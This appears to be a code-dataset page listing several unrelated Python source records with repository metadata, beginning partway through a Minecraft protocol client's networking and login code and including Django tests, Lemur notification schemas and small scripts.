self.write_packet(handshake)
def _handle_exception(self, exc, exc_info):
# Call the current PacketReactor's exception handler.
try:
if self.reactor.handle_exception(exc, exc_info):
return
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
# Call the user-registered exception handlers in order.
for handler, exc_types in self._exception_handlers:
if not exc_types or isinstance(exc, exc_types):
try:
handler(exc, exc_info)
caught = True
break
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
else:
caught = False
# Call the user-specified final exception handler.
if self.handle_exception not in (None, False):
try:
self.handle_exception(exc, exc_info)
except Exception as new_exc:
exc, exc_info = new_exc, sys.exc_info()
# For backward compatibility, try to set the 'exc_info' attribute.
try:
exc.exc_info = exc_info
except (TypeError, AttributeError):
pass
# Record the exception and cleanly terminate the connection.
self.exception, self.exc_info = exc, exc_info
self.disconnect(immediate=True)
# If allowed by the final exception handler, re-raise the exception.
if self.handle_exception is None and not caught:
raise_(*exc_info)
def _version_mismatch(self, server_protocol=None, server_version=None):
if server_protocol is None:
server_protocol = SUPPORTED_MINECRAFT_VERSIONS.get(server_version)
if server_protocol is None:
vs = 'version' if server_version is None else \
('version of %s' % server_version)
else:
vs = ('protocol version of %d' % server_protocol) + \
('' if server_version is None else ' (%s)' % server_version)
ss = 'supported, but not allowed for this connection' \
if server_protocol in SUPPORTED_PROTOCOL_VERSIONS \
else 'not supported'
raise VersionMismatch("Server's %s is %s." % (vs, ss))
def _handle_exit(self):
if not self.connected and self.handle_exit is not None:
self.handle_exit()
def _react(self, packet):
try:
for listener in self.early_packet_listeners:
listener.call_packet(packet)
self.reactor.react(packet)
for listener in self.packet_listeners:
listener.call_packet(packet)
except IgnorePacket:
pass
class NetworkingThread(threading.Thread):
def __init__(self, connection, previous=None):
threading.Thread.__init__(self)
self.interrupt = False
self.connection = connection
self.name = "Networking Thread"
self.daemon = True
self.previous_thread = previous
def run(self):
self.connection.running_networking_thread += 1
try:
if self.previous_thread is not None:
if self.previous_thread.is_alive():
self.previous_thread.join()
with self.connection._write_lock:
self.connection.networking_thread = self
self.connection.new_networking_thread = None
self._run()
self.connection._handle_exit()
except Exception as e:
self.interrupt = True
self.connection._handle_exception(e, sys.exc_info())
finally:
with self.connection._write_lock:
self.connection.networking_thread = None
self.connection.running_networking_thread -= 1
def _run(self):
while not self.interrupt:
# Attempt to write out as many as 300 packets.
num_packets = 0
with self.connection._write_lock:
try:
while not self.interrupt and self.connection._pop_packet():
num_packets += 1
if num_packets >= 300:
break
exc_info = None
except IOError:
exc_info = sys.exc_info()
# If any packets remain to be written, resume writing as soon
# as possible after reading any available packets; otherwise,
# wait for up to 50ms (1 tick) for new packets to arrive.
if self.connection._outgoing_packet_queue:
read_timeout = 0
else:
read_timeout = 0.05
# Read and react to as many as 500 packets.
while num_packets < 500 and not self.interrupt:
packet = self.connection.reactor.read_packet(
self.connection.file_object, timeout=read_timeout)
if not packet:
break
num_packets += 1
self.connection._react(packet)
read_timeout = 0
# Ignore the earlier exception if a disconnect packet is
# received, as it may have been caused by trying to write to
# the closed socket, which does not represent a program error.
if exc_info is not None and packet.packet_name == "disconnect":
exc_info = None
if exc_info is not None:
raise_(*exc_info)
class PacketReactor(object):
"""
Reads and reacts to packets
"""
state_name = None
# Handshaking is considered the "default" state
get_clientbound_packets = staticmethod(clientbound.handshake.get_packets)
def __init__(self, connection):
self.connection = connection
context = self.connection.context
self.clientbound_packets = {
packet.get_id(context): packet
for packet in self.__class__.get_clientbound_packets(context)}
def read_packet(self, stream, timeout=0):
# Block for up to `timeout' seconds waiting for `stream' to become
# readable, returning `None' if the timeout elapses.
ready_to_read = select.select([stream], [], [], timeout)[0]
if ready_to_read:
length = VarInt.read(stream)
packet_data = packets.PacketBuffer()
packet_data.send(stream.read(length))
# Ensure we read all the packet
while len(packet_data.get_writable()) < length:
packet_data.send(
stream.read(length - len(packet_data.get_writable())))
packet_data.reset_cursor()
if self.connection.options.compression_enabled:
decompressed_size = VarInt.read(packet_data)
if decompressed_size > 0:
decompressor = zlib.decompressobj()
decompressed_packet = decompressor.decompress(
packet_data.read())
assert len(decompressed_packet) == decompressed_size, \
'decompressed length %d, but expected %d' % \
(len(decompressed_packet), decompressed_size)
packet_data.reset()
packet_data.send(decompressed_packet)
packet_data.reset_cursor()
packet_raw = copy.deepcopy(packet_data.bytes.getvalue())
packet_id = VarInt.read(packet_data)
# If we know the structure of the packet, attempt to parse it
# otherwise just skip it
if packet_id in self.clientbound_packets:
packet = self.clientbound_packets[packet_id]()
packet.context = self.connection.context
packet.read(packet_data)
else:
packet = packets.Packet(context=self.connection.context)
packet.data = packet_raw
return packet
else:
return None
def react(self, packet):
"""Called with each incoming packet after early packet listeners are
run (if none of them raise 'IgnorePacket'), but before regular
packet listeners are run. If this method raises 'IgnorePacket', no
subsequent packet listeners will be called for this packet.
"""
raise NotImplementedError("Call to base reactor")
def handle_exception(self, exc, exc_info):
"""Called when an exception is raised in the networking thread. If this
method returns True, the default action will be prevented and the
exception ignored (but the networking thread will still terminate).
"""
return False
class LoginReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.login.get_packets)
def react(self, packet):
if packet.packet_name == "encryption request":
secret = encryption.generate_shared_secret()
token, encrypted_secret = encryption.encrypt_token_and_secret(
packet.public_key, packet.verify_token, secret)
# A server id of '-' means the server is in offline mode
if packet.server_id != '-':
server_id = encryption.generate_verification_hash(
packet.server_id, secret, packet.public_key)
if self.connection.auth_token is not None:
self.connection.auth_token.join(server_id)
encryption_response = serverbound.login.EncryptionResponsePacket()
encryption_response.shared_secret = encrypted_secret
encryption_response.verify_token = token
# Forced because we'll have encrypted the connection by the time
# it reaches the outgoing queue
self.connection.write_packet(encryption_response, force=True)
# Enable the encryption
cipher = encryption.create_AES_cipher(secret)
encryptor = cipher.encryptor()
decryptor = cipher.decryptor()
self.connection.socket = encryption.EncryptedSocketWrapper(
self.connection.socket, encryptor, decryptor)
self.connection.file_object = \
encryption.EncryptedFileObjectWrapper(
self.connection.file_object, decryptor)
elif packet.packet_name == "disconnect":
# Receiving a disconnect packet in the login state indicates an
# abnormal condition. Raise an exception explaining the situation.
try:
msg = json.loads(packet.json_data)['text']
except (ValueError, TypeError, KeyError):
msg = packet.json_data
match = re.match(r"Outdated (client! Please use|server!"
r" I'm still on) (?P<ver>\S+)$", msg)
if match:
ver = match.group('ver')
self.connection._version_mismatch(server_version=ver)
raise LoginDisconnect('The server rejected our login attempt '
'with: "%s".' % msg)
elif packet.packet_name == "login success":
self.connection.reactor = PlayingReactor(self.connection)
self.connection.recorder.start_recording()
elif packet.packet_name == "set compression":
self.connection.options.compression_threshold = packet.threshold
self.connection.options.compression_enabled = True
elif packet.packet_name == "login plugin request":
self.connection.write_packet(
serverbound.login.PluginResponsePacket(
message_id=packet.message_id, successful=False))
class PlayingReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.play.get_packets)
def react(self, packet):
if packet.packet_name == "set compression":
self.connection.options.compression_threshold = packet.threshold
self.connection.options.compression_enabled = True
elif packet.packet_name == "keep alive":
keep_alive_packet = serverbound.play.KeepAlivePacket()
keep_alive_packet.keep_alive_id = packet.keep_alive_id
self.connection.write_packet(keep_alive_packet)
elif packet.packet_name == "player position and look":
if self.connection.context.protocol_version >= 107:
teleport_confirm = serverbound.play.TeleportConfirmPacket()
teleport_confirm.teleport_id = packet.teleport_id
self.connection.write_packet(teleport_confirm)
# PCRC remove else
position_response = serverbound.play.PositionAndLookPacket()
position_response.x = packet.x
position_response.feet_y = packet.y
position_response.z = packet.z
position_response.yaw = packet.yaw
position_response.pitch = packet.pitch
position_response.on_ground = True
self.connection.write_packet(position_response)
self.connection.spawned = True
elif packet.packet_name == "disconnect":
self.connection.disconnect()
class StatusReactor(PacketReactor):
get_clientbound_packets = staticmethod(clientbound.status.get_packets)
def __init__(self, connection, do_ping=False):
super(StatusReactor, self).__init__(connection)
self.do_ping = do_ping
def react(self, packet):
if packet.packet_name == "response":
status_dict = json.loads(packet.json_response)
if self.do_ping:
ping_packet = serverbound.status.PingPacket()
# NOTE: it may be better to depend on the `monotonic' package
# or something similar for more accurate time measurement.
ping_packet.time = int(1000 * timeit.default_timer())
self.connection.write_packet(ping_packet)
else:
self.connection.disconnect()
self.handle_status(status_dict)
elif packet.packet_name == "ping":
if self.do_ping:
now = int(1000 * timeit.default_timer())
self.connection.disconnect()
self.handle_ping(now - packet.time)
def handle_status(self, status_dict):
print(status_dict)
def handle_ping(self, latency_ms):
print('Ping: %d ms' % latency_ms)
class PlayingStatusReactor(StatusReactor):
def __init__(self, connection):
super(PlayingStatusReactor, self).__init__(connection, do_ping=False)
def handle_status(self, status):
if status == {}:
# This can occur when we connect to a Mojang server while it is
# still initialising, so it must not cause the client to connect
# with the default version.
raise IOError('Invalid server status.')
elif 'version' not in status or 'protocol' not in status['version']:
return self.handle_failure()
proto = status['version']['protocol']
if proto not in self.connection.allowed_proto_versions:
self.connection._version_mismatch(
server_protocol=proto,
server_version=status['version'].get('name'))
self.handle_proto_version(proto)
def handle_proto_version(self, proto_version):
self.connection.allowed_proto_versions = {proto_version}
self.connection.connect()
def handle_failure(self):
self.handle_proto_version(self.connection.default_proto_version)
def handle_exception(self, exc, exc_info):
if isinstance(exc, EOFError):
# An exception of this type may indicate that the server does not
# properly support status queries, so we treat it as non-fatal.
self.connection.disconnect(immediate=True)
self.handle_failure()
return True
| [
"[email protected]"
] | |
d9a599f338f61afbe4051bd2a7d2602ccc66f966 | 7b1fdeb2ecac20764945c8e7222a8d4d58eec39c | /src/reviews/tests/test_js.py | 61d235f80fd5e9dc0adc2a762f8bd23e466ad84a | [
"MIT"
] | permissive | andyjia/phase | 268e8ed76e15df0590042f88415182dc4bccb414 | 7a21716f4427ea1830139a361c61bf9f4936ef20 | refs/heads/master | 2021-01-19T07:05:27.663115 | 2016-05-05T19:41:12 | 2016-05-05T19:41:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.contrib.contenttypes.models import ContentType
from casper.tests import CasperTestCase
from accounts.factories import UserFactory
from categories.factories import CategoryFactory
from documents.factories import DocumentFactory
from default_documents.models import ContractorDeliverable
from default_documents.factories import (
ContractorDeliverableFactory, ContractorDeliverableRevisionFactory)
from reviews.factories import DistributionListFactory
class DistributionListWidgetTestDistributionListWidgetTests(CasperTestCase):
def setUp(self):
Model = ContentType.objects.get_for_model(ContractorDeliverable)
self.category = CategoryFactory(
category_template__metadata_model=Model)
self.user = UserFactory(
email='[email protected]',
password='pass',
is_superuser=True,
category=self.category)
self.client.login(email=self.user.email, password='pass')
self.doc = DocumentFactory(
category=self.category,
metadata_factory_class=ContractorDeliverableFactory,
revision_factory_class=ContractorDeliverableRevisionFactory,
)
url = self.doc.get_edit_url()
self.url = '%s%s' % (self.live_server_url, url)
self.test_file = os.path.join(
os.path.dirname(__file__),
'casper_tests',
'tests.js'
)
def test_select_distribution_list(self):
dl = DistributionListFactory(
categories=[self.category],
name='Team Cassoulet',
)
DistributionListFactory(
categories=[self.category],
name='Team Oui Oui et ses potes')
self.assertTrue(self.casper(
self.test_file,
url=self.url,
leader_id=dl.leader_id,
approver_id=dl.approver_id,
))
| [
"[email protected]"
] | |
252b94b945f484175867be66162fd9c41da8bc13 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_16487.py | b6a7d68ce588b946370a4e83da6751bb07efd245 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | # Django: Why is timezone.now() off by one day?
tzinfo=<UTC>
| [
"[email protected]"
] | |
8d97914292279f7ff53414df4b74de0dac7fa867 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2725/60697/271503.py | c53cb441631cdc587a7d9bc03c1578d8bcbd51c6 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | t=int(input())
nums=[]
for i in range(t):
nums.append(int(input()))
for i in range(t):
if(nums[i]%2==0):
print("1")
else:
print("0") | [
"[email protected]"
] | |
186b9b7fb9c2f35bc5d4cea69b7abd64c1d13e2d | c7d5950b281e4f8063f21de151775c648664f03a | /lemur/notifications/schemas.py | 2c93d32b615ef7e246e6fec1d1b703ed1948ecf0 | [
"Apache-2.0"
] | permissive | mik373/lemur | b5cc6655cb2e361d99e175f668efb87592009cd0 | 121b72307ec101e84b9cc4090cfa3223806a5517 | refs/heads/master | 2021-01-18T15:01:32.709233 | 2016-06-14T00:22:45 | 2016-06-14T16:20:18 | 57,319,811 | 0 | 1 | null | 2016-04-28T17:03:25 | 2016-04-28T17:03:23 | Python | UTF-8 | Python | false | false | 1,707 | py | """
.. module: lemur.notifications.schemas
:platform: unix
:copyright: (c) 2015 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <[email protected]>
"""
from marshmallow import fields, post_dump
from lemur.common.schema import LemurInputSchema, LemurOutputSchema
from lemur.schemas import PluginInputSchema, PluginOutputSchema, AssociatedCertificateSchema
class NotificationInputSchema(LemurInputSchema):
id = fields.Integer()
label = fields.String(required=True)
description = fields.String()
active = fields.Boolean()
plugin = fields.Nested(PluginInputSchema, required=True)
certificates = fields.Nested(AssociatedCertificateSchema, many=True, missing=[])
class NotificationOutputSchema(LemurOutputSchema):
id = fields.Integer()
label = fields.String()
description = fields.String()
active = fields.Boolean()
options = fields.List(fields.Dict())
plugin = fields.Nested(PluginOutputSchema)
certificates = fields.Nested(AssociatedCertificateSchema, many=True, missing=[])
@post_dump
def fill_object(self, data):
data['plugin']['pluginOptions'] = data['options']
return data
class NotificationNestedOutputSchema(LemurOutputSchema):
__envelope__ = False
id = fields.Integer()
label = fields.String()
description = fields.String()
active = fields.Boolean()
options = fields.List(fields.Dict())
plugin = fields.Nested(PluginOutputSchema)
notification_input_schema = NotificationInputSchema()
notification_output_schema = NotificationOutputSchema()
notifications_output_schema = NotificationOutputSchema(many=True)
| [
"[email protected]"
] | |
3b1adcb9f174265a46a9176f280a6c420925cff1 | 50a4af2cc044fe9fb6b2dfb4f612bdefb18153b6 | /src/players/__init__.py | 088e3caaa2aa2d151af175a6f47179b44262913e | [
"MIT"
] | permissive | pawelad/nba-rank | 45bbc2aa798c40ef811d9c617eb4768b7cebd90d | ff9f80609c25435307608002ee3b36951e337043 | refs/heads/master | 2022-07-15T15:53:01.385873 | 2016-08-14T16:48:20 | 2016-08-14T16:48:20 | 53,074,080 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53 | py | default_app_config = 'players.apps.PlayersAppConfig'
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.